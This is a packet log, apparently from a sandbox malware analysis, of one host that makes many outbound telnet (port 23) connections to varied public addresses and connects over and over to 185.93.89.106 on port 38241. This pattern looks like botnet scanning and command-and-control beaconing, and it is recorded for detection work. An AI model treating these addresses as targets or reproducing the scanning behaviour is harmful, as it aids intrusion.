Feb 10, 2025 20:08:32.633048058 CET	23	48880	56.172.19.240	192.168.2.23
Feb 10, 2025 20:08:32.633066893 CET	33542	23	192.168.2.23	24.183.191.62
Feb 10, 2025 20:08:32.633066893 CET	23	50992	207.245.241.43	192.168.2.23
Feb 10, 2025 20:08:32.633066893 CET	35992	23	192.168.2.23	2.217.1.188
Feb 10, 2025 20:08:32.633076906 CET	23	48406	210.200.91.135	192.168.2.23
Feb 10, 2025 20:08:32.633107901 CET	50992	23	192.168.2.23	207.245.241.43
Feb 10, 2025 20:08:32.633109093 CET	48406	23	192.168.2.23	210.200.91.135
Feb 10, 2025 20:08:32.633117914 CET	23	56794	72.249.97.86	192.168.2.23
Feb 10, 2025 20:08:32.633119106 CET	48880	23	192.168.2.23	56.172.19.240
Feb 10, 2025 20:08:32.633128881 CET	23	47786	113.79.1.69	192.168.2.23
Feb 10, 2025 20:08:32.633141994 CET	23	52086	40.246.66.16	192.168.2.23
Feb 10, 2025 20:08:32.633157015 CET	56794	23	192.168.2.23	72.249.97.86
Feb 10, 2025 20:08:32.633157969 CET	23	52634	42.1.143.224	192.168.2.23
Feb 10, 2025 20:08:32.633167028 CET	47786	23	192.168.2.23	113.79.1.69
Feb 10, 2025 20:08:32.633192062 CET	23	44184	39.18.30.246	192.168.2.23
Feb 10, 2025 20:08:32.633196115 CET	52086	23	192.168.2.23	40.246.66.16
Feb 10, 2025 20:08:32.633203983 CET	23	48376	166.145.68.246	192.168.2.23
Feb 10, 2025 20:08:32.633215904 CET	52634	23	192.168.2.23	42.1.143.224
Feb 10, 2025 20:08:32.633218050 CET	23	50468	12.131.90.186	192.168.2.23
Feb 10, 2025 20:08:32.633229017 CET	23	57116	46.72.228.131	192.168.2.23
Feb 10, 2025 20:08:32.633239985 CET	23	45768	156.16.86.150	192.168.2.23
Feb 10, 2025 20:08:32.633244991 CET	48376	23	192.168.2.23	166.145.68.246
Feb 10, 2025 20:08:32.633248091 CET	44184	23	192.168.2.23	39.18.30.246
Feb 10, 2025 20:08:32.633259058 CET	23	55524	176.228.79.79	192.168.2.23
Feb 10, 2025 20:08:32.633269072 CET	23	58512	109.176.168.142	192.168.2.23
Feb 10, 2025 20:08:32.633275986 CET	57116	23	192.168.2.23	46.72.228.131
Feb 10, 2025 20:08:32.633275986 CET	50468	23	192.168.2.23	12.131.90.186
Feb 10, 2025 20:08:32.633284092 CET	23	52828	191.109.3.38	192.168.2.23
Feb 10, 2025 20:08:32.633290052 CET	45768	23	192.168.2.23	156.16.86.150
Feb 10, 2025 20:08:32.633301020 CET	58512	23	192.168.2.23	109.176.168.142
Feb 10, 2025 20:08:32.633301973 CET	55524	23	192.168.2.23	176.228.79.79
Feb 10, 2025 20:08:32.633302927 CET	23	53000	75.96.15.150	192.168.2.23
Feb 10, 2025 20:08:32.633308887 CET	52828	23	192.168.2.23	191.109.3.38
Feb 10, 2025 20:08:32.633312941 CET	23	59782	217.197.179.51	192.168.2.23
Feb 10, 2025 20:08:32.633323908 CET	23	59714	130.86.120.166	192.168.2.23
Feb 10, 2025 20:08:32.633337021 CET	53000	23	192.168.2.23	75.96.15.150
Feb 10, 2025 20:08:32.633389950 CET	59782	23	192.168.2.23	217.197.179.51
Feb 10, 2025 20:08:32.633629084 CET	59714	23	192.168.2.23	130.86.120.166
Feb 10, 2025 20:08:32.634916067 CET	23	56188	159.34.99.239	192.168.2.23
Feb 10, 2025 20:08:32.634951115 CET	23	59750	115.157.78.166	192.168.2.23
Feb 10, 2025 20:08:32.634953022 CET	56188	23	192.168.2.23	159.34.99.239
Feb 10, 2025 20:08:32.634964943 CET	23	49640	116.96.132.130	192.168.2.23
Feb 10, 2025 20:08:32.635063887 CET	23	52490	211.166.29.100	192.168.2.23
Feb 10, 2025 20:08:32.635076046 CET	23	60296	121.206.29.3	192.168.2.23
Feb 10, 2025 20:08:32.635099888 CET	59750	23	192.168.2.23	115.157.78.166
Feb 10, 2025 20:08:32.635113001 CET	49640	23	192.168.2.23	116.96.132.130
Feb 10, 2025 20:08:32.635149956 CET	52490	23	192.168.2.23	211.166.29.100
Feb 10, 2025 20:08:32.635150909 CET	60296	23	192.168.2.23	121.206.29.3
Feb 10, 2025 20:08:33.002338886 CET	43928	443	192.168.2.23	91.189.91.42
Feb 10, 2025 20:08:33.562134027 CET	39782	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:33.566935062 CET	38241	39782	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:33.566996098 CET	39782	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:33.567862034 CET	39782	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:33.572664022 CET	38241	39782	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:33.572755098 CET	39782	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:33.577542067 CET	38241	39782	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:34.174860001 CET	38241	39782	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:34.174932003 CET	39782	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:34.174968004 CET	39782	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:35.252120972 CET	39784	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:35.257020950 CET	38241	39784	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:35.257087946 CET	39784	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:35.258883953 CET	39784	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:35.263742924 CET	38241	39784	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:35.263792038 CET	39784	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:35.268635988 CET	38241	39784	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:35.880822897 CET	38241	39784	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:35.880920887 CET	39784	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:35.880960941 CET	39784	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:36.890619040 CET	39786	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:36.895756006 CET	38241	39786	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:36.895876884 CET	39786	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:36.897187948 CET	39786	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:36.901951075 CET	38241	39786	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:36.902013063 CET	39786	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:36.906805038 CET	38241	39786	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:37.526410103 CET	38241	39786	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:37.526561975 CET	39786	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:37.526561975 CET	39786	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:38.374207020 CET	42836	443	192.168.2.23	91.189.91.43
Feb 10, 2025 20:08:38.535559893 CET	39788	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:38.540419102 CET	38241	39788	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:38.540483952 CET	39788	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:38.541513920 CET	39788	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:38.546313047 CET	38241	39788	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:38.546360016 CET	39788	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:38.551152945 CET	38241	39788	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:39.185583115 CET	38241	39788	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:39.185662985 CET	39788	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:39.185703993 CET	39788	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:39.914011955 CET	42516	80	192.168.2.23	109.202.202.202
Feb 10, 2025 20:08:40.194674015 CET	39790	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:40.199707031 CET	38241	39790	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:40.199779987 CET	39790	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:40.200512886 CET	39790	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:40.205333948 CET	38241	39790	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:40.205383062 CET	39790	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:40.210320950 CET	38241	39790	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:40.840415001 CET	38241	39790	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:40.840493917 CET	39790	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:40.840531111 CET	39790	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:41.849394083 CET	39792	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:41.854278088 CET	38241	39792	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:41.854353905 CET	39792	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:41.855031967 CET	39792	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:41.859833002 CET	38241	39792	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:41.859888077 CET	39792	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:41.864641905 CET	38241	39792	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:42.460539103 CET	38241	39792	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:42.460613012 CET	39792	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:42.460658073 CET	39792	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:43.468805075 CET	39794	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:43.473633051 CET	38241	39794	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:43.473690987 CET	39794	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:43.474406958 CET	39794	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:43.479129076 CET	38241	39794	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:43.479171991 CET	39794	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:43.483944893 CET	38241	39794	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:44.160866976 CET	38241	39794	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:44.160944939 CET	39794	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:44.160993099 CET	39794	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:45.169641972 CET	39796	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:45.174521923 CET	38241	39796	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:45.174583912 CET	39796	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:45.175271034 CET	39796	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:45.180109978 CET	38241	39796	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:45.180164099 CET	39796	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:45.185013056 CET	38241	39796	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:45.835731030 CET	38241	39796	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:45.835834026 CET	39796	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:45.835877895 CET	39796	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:46.847692013 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:46.852519989 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:46.852572918 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:46.853720903 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:46.858438015 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:46.858524084 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:46.863270044 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:47.466284990 CET	38241	39798	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:47.466367006 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:47.466417074 CET	39798	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:48.477077961 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:48.481925011 CET	38241	39800	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:48.482002020 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:48.482745886 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:48.487482071 CET	38241	39800	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:48.487541914 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:48.492921114 CET	38241	39800	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:49.102730989 CET	38241	39800	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:49.102813959 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:49.102880955 CET	39800	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:50.111515999 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:50.116339922 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:50.116406918 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:50.117052078 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:50.121812105 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:50.121860981 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:50.126686096 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:50.754395008 CET	38241	39802	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:50.754467010 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:50.754508018 CET	39802	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:51.764807940 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:51.771897078 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:51.771958113 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:51.772567034 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:51.778399944 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:51.778512001 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:51.784133911 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:52.399823904 CET	38241	39804	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:52.399925947 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:52.399957895 CET	39804	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:53.412132978 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:53.416923046 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:53.416976929 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:53.417649984 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:53.422385931 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:53.422434092 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:53.427201033 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:53.732075930 CET	43928	443	192.168.2.23	91.189.91.42
Feb 10, 2025 20:08:54.120779037 CET	38241	39806	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:54.120867968 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:54.120910883 CET	39806	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:55.128763914 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:55.133578062 CET	38241	39808	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:55.133636951 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:55.134330034 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:55.139106035 CET	38241	39808	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:55.139153957 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:55.143945932 CET	38241	39808	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:55.746121883 CET	38241	39808	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:55.746195078 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:55.746234894 CET	39808	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:56.754684925 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:56.759507895 CET	38241	39810	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:56.759573936 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:56.760179996 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:56.764960051 CET	38241	39810	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:56.765017033 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:56.769850016 CET	38241	39810	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:57.372782946 CET	38241	39810	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:57.372838974 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:57.372879028 CET	39810	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:58.382324934 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:58.387137890 CET	38241	39812	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:58.387213945 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:58.388062954 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:58.392829895 CET	38241	39812	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:58.392930031 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:58.397744894 CET	38241	39812	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:59.006314039 CET	38241	39812	185.93.89.106	192.168.2.23
Feb 10, 2025 20:08:59.006376982 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:08:59.006411076 CET	39812	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:00.014962912 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:00.020435095 CET	38241	39814	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:00.020529985 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:00.021477938 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:00.026217937 CET	38241	39814	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:00.026269913 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:00.031003952 CET	38241	39814	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:00.650091887 CET	38241	39814	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:00.650160074 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:00.650249004 CET	39814	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:01.658957958 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:01.663779020 CET	38241	39816	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:01.663841963 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:01.664463997 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:01.669253111 CET	38241	39816	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:01.669332981 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:01.674132109 CET	38241	39816	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:02.326534033 CET	38241	39816	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:02.326613903 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:02.326663017 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:03.335541964 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:03.340348005 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:03.340428114 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:03.341113091 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:03.345875025 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:03.345937967 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:03.350809097 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:03.970701933 CET	42836	443	192.168.2.23	91.189.91.43
Feb 10, 2025 20:09:03.976181030 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:03.976267099 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:03.976315022 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:04.985218048 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:04.990044117 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:04.990111113 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:04.990816116 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:04.995615959 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:04.995668888 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:05.000428915 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:05.667154074 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:05.667263031 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:05.667296886 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:06.676219940 CET	39822	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:06.681087971 CET	38241	39822	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:06.681152105 CET	39822	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:06.681868076 CET	39822	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:06.686633110 CET	38241	39822	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:06.686686993 CET	39822	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:06.691517115 CET	38241	39822	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:07.300952911 CET	38241	39822	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:07.301095963 CET	39822	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:07.301135063 CET	39822	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:08.314605951 CET	39824	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:08.319437027 CET	38241	39824	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:08.319508076 CET	39824	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:08.320133924 CET	39824	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:08.324930906 CET	38241	39824	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:08.324995995 CET	39824	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:08.329721928 CET	38241	39824	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:08.921717882 CET	38241	39824	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:08.921875954 CET	39824	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:08.921973944 CET	39824	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:09.931289911 CET	39826	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:09.936105013 CET	38241	39826	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:09.936172962 CET	39826	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:09.937055111 CET	39826	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:09.941883087 CET	38241	39826	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:09.941934109 CET	39826	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:09.946690083 CET	38241	39826	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:10.113946915 CET	42516	80	192.168.2.23	109.202.202.202
Feb 10, 2025 20:09:10.539747953 CET	38241	39826	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:10.540096998 CET	39826	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:10.540096998 CET	39826	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:11.549535990 CET	39828	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:11.554358006 CET	38241	39828	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:11.554447889 CET	39828	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:11.555497885 CET	39828	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:11.560340881 CET	38241	39828	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:11.560435057 CET	39828	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:11.565262079 CET	38241	39828	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:12.188918114 CET	38241	39828	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:12.189049006 CET	39828	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:12.189114094 CET	39828	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:13.197786093 CET	39830	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:13.202608109 CET	38241	39830	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:13.202649117 CET	39830	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:13.203176975 CET	39830	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:13.207968950 CET	38241	39830	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:13.208008051 CET	39830	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:13.212779045 CET	38241	39830	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:13.841439009 CET	38241	39830	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:13.841698885 CET	39830	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:13.841698885 CET	39830	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:14.851805925 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:14.856623888 CET	38241	39832	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:14.857203007 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:14.858314037 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:14.863116980 CET	38241	39832	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:14.863219023 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:14.868731022 CET	38241	39832	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:24.864168882 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:24.869122982 CET	38241	39832	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:25.049024105 CET	38241	39832	185.93.89.106	192.168.2.23
Feb 10, 2025 20:09:25.049124002 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:09:34.686409950 CET	43928	443	192.168.2.23	91.189.91.42
Feb 10, 2025 20:09:55.163640976 CET	42836	443	192.168.2.23	91.189.91.43
Feb 10, 2025 20:10:25.079632044 CET	39832	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:10:25.084711075 CET	38241	39832	185.93.89.106	192.168.2.23
Feb 10, 2025 20:10:25.252490044 CET	38241	39832	185.93.89.106	192.168.2.23
Feb 10, 2025 20:10:25.252610922 CET	39832	38241	192.168.2.23	185.93.89.106

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 10, 2025 20:08:31.894284964 CET	41711	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:31.904339075 CET	53	41711	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:33.554970026 CET	35379	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:33.561451912 CET	53	35379	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:35.244630098 CET	51520	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:35.251049042 CET	53	51520	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:36.883641958 CET	48042	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:36.890022993 CET	53	48042	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:38.528568029 CET	55780	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:38.535037041 CET	53	55780	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:40.187525988 CET	57052	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:08:40.193788052 CET	53	57052	8.8.8.8	192.168.2.23
Feb 10, 2025 20:08:41.842446089 CET	59300	53	192.168.2.23	8.8.8.8
